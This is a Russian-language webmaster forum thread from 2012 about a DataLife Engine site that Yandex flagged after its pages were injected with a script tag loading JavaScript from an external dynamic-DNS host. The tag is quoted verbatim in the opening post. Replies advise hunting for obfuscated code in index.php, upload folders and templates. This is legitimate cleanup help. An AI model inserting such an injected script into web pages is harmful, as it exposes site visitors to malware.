X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость ( Вход | Регистрация )

2 страниц V   1 2 >
Открыть тему
Тема закрыта
> Вредоносный код, яндекс послал сайт далеко
ramazanaman
ramazanaman
Topic Starter сообщение 28.7.2012, 5:56; Ответить: ramazanaman
Сообщение #1


Завсегдатай
*****

Группа: Banned
Сообщений: 553
Регистрация: 14.10.2011
Поблагодарили: 83 раза
Репутация:   14  


Вот сайт http://kon7ert.ru/, в самом конце код

<script src="http://linuxme.gotdns.org/rss.js"></script> и ниже есчо на эту же страницу. Владелец подцепил говорит на однокластниках. Движок дле, я облазил все файлы темы нет такого урла там. Где может этот долбанный код быть?
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
whitesunset
whitesunset
сообщение 28.7.2012, 6:10; Ответить: whitesunset
Сообщение #2


Участник
***

Группа: User
Сообщений: 234
Регистрация: 9.12.2010
Поблагодарили: 95 раз
Репутация:   20  


Совершенно не знаком с DLE, но логично было бы искать после "<!-- DataLife Engine Copyright SoftNews Media Group (http://dle-news.ru) -->"
Если на сайт залит шелл, то функция вставки вредоносной строки скорее всего обфусцирована, и по прямому поиску вы ее вряд ли найдете.

Сообщение отредактировал whitesunset - 28.7.2012, 6:11


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
ramazanaman
ramazanaman
Topic Starter сообщение 28.7.2012, 6:22; Ответить: ramazanaman
Сообщение #3


Завсегдатай
*****

Группа: Banned
Сообщений: 553
Регистрация: 14.10.2011
Поблагодарили: 83 раза
Репутация:   14  


(whitesunset @ 28.7.2012, 5:10) *
Совершенно не знаком с DLE, но логично было бы искать после "<!-- DataLife Engine Copyright SoftNews Media Group (http://dle-news.ru) -->"
Если на сайт залит шелл, то функция вставки вредоносной строки скорее всего обфусцирована, и по прямому поиску вы ее вряд ли найдете.


Я же написал что искал. Я спрашивал знакомого, тоже говорит через функции. Но в какой папке может быть этот файл хрен его знает.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
install
install
сообщение 28.7.2012, 8:58; Ответить: install
Сообщение #4


Яндекс ЛОХ
*******


Группа: Active User
Сообщений: 3530
Регистрация: 28.5.2009
Из: Нижневартовска
Поблагодарили: 1376 раз
Репутация:   201  


Ищите в папках uploads, files обычно название файла левое и ни каким образом не относится к движку.
По дате изменения посмотрите, когда и какие файлы были изменены.


--------------------


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
djalin
djalin
сообщение 28.7.2012, 17:34; Ответить: djalin
Сообщение #5


Бывалый
****

Группа: User
Сообщений: 414
Регистрация: 8.5.2011
Поблагодарили: 87 раз
Репутация:   9  




собственно вот он

а банально індекс или ядро движка?

Сообщение отредактировал djalin - 28.7.2012, 17:35


--------------------
Услуги: установка WP + плагины. Установка SAPE: wordpress/phpbb/Quick.Cms/некоторые самописы (php)
Хостинг - The HostVille
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
ramazanaman
ramazanaman
Topic Starter сообщение 28.7.2012, 21:05; Ответить: ramazanaman
Сообщение #6


Завсегдатай
*****

Группа: Banned
Сообщений: 553
Регистрация: 14.10.2011
Поблагодарили: 83 раза
Репутация:   14  


(djalin @ 28.7.2012, 16:34) *


собственно вот он

а банально індекс или ядро движка?


Непонял вопроса честно говоря.

Я с кодом работать усею и исходник смотреть тем более evrika.gif . Все файлы темы проверил и ее там нет просто. Значит он в другой папке, а там до хрена папок которые я уже перелазил и есть JS и вот незнаю где именно находится функция вызова.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
elvis81
elvis81
сообщение 28.7.2012, 23:43; Ответить: elvis81
Сообщение #7


Познающий
******

Группа: Active User
Сообщений: 1240
Регистрация: 5.8.2008
Из: дом
Поблагодарили: 222 раза
Репутация:   34  


ramazanaman, не хотелось бы Вас обижать, но всё же.
Посмотрите файл index.php в самом низу после
echo "\n<!-- DataLife Engine Copyright SoftNews Media Group (http://dle-news.ru) -->\r\n";

не должно быть ничего кроме
GzipOut ();
?>


Если стоят непонятные символы закодированные, то можете их удалять.


--------------------
ТИц поднимают, поднималкой для ТИца
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
ramazanaman
ramazanaman
Topic Starter сообщение 29.7.2012, 14:05; Ответить: ramazanaman
Сообщение #8


Завсегдатай
*****

Группа: Banned
Сообщений: 553
Регистрация: 14.10.2011
Поблагодарили: 83 раза
Репутация:   14  


А вот индекс я не проверил кстати. Только майн и другие файлы темы. Сейчас проверю и напишу что да как.


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
ole4901
ole4901
сообщение 30.7.2012, 12:15; Ответить: ole4901
Сообщение #9


Участник
***

Группа: User
Сообщений: 122
Регистрация: 19.2.2012
Поблагодарили: 3 раза
Репутация:   0  


Частенько в шаблоны вшивают вредоносный код.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
airman
airman
сообщение 30.7.2012, 14:26; Ответить: airman
Сообщение #10


Завсегдатай
*****

Группа: Active User
Сообщений: 511
Регистрация: 26.1.2010
Из: Россия
Поблагодарили: 204 раза
Репутация:   28  


раз код убрали - пишите платонам, сайт должны вернуть


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
2 страниц V   1 2 >
Открыть тему
Тема закрыта
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Открытая тема (нет новых ответов) Тема имеет прикрепленные файлыPHP код для og:image в Джумла
Нужен PHP код для заполнения мета тега meta property
8 Курыкин 1350 25.10.2017, 12:06
автор: Fassendek
Открытая тема (нет новых ответов) Промо код Гугл Эдвордс 2000 рублей
Может кому то будет нужен
3 alllffa 865 9.10.2017, 12:12
автор: alllffa
Открытая тема (нет новых ответов) Требуется поправить (оптимизировать) код вёрстки WP
0 Seo-optimist 747 26.12.2015, 21:19
автор: Seo-optimist
Открытая тема (нет новых ответов) [Бесплатно] Промо-код на скидку 30% в SpyWords
В один руки
0 JOHNY 2394 2.10.2015, 16:38
автор: JOHNY
Открытая тема (нет новых ответов) Получил HTTP-код ошибки 400 при выборке источник RSS
Необходимо исправить
2 XpressMusic 1190 22.8.2014, 17:49
автор: XpressMusic


 



RSS Текстовая версия Сейчас: 14.12.2017, 19:37
Дизайн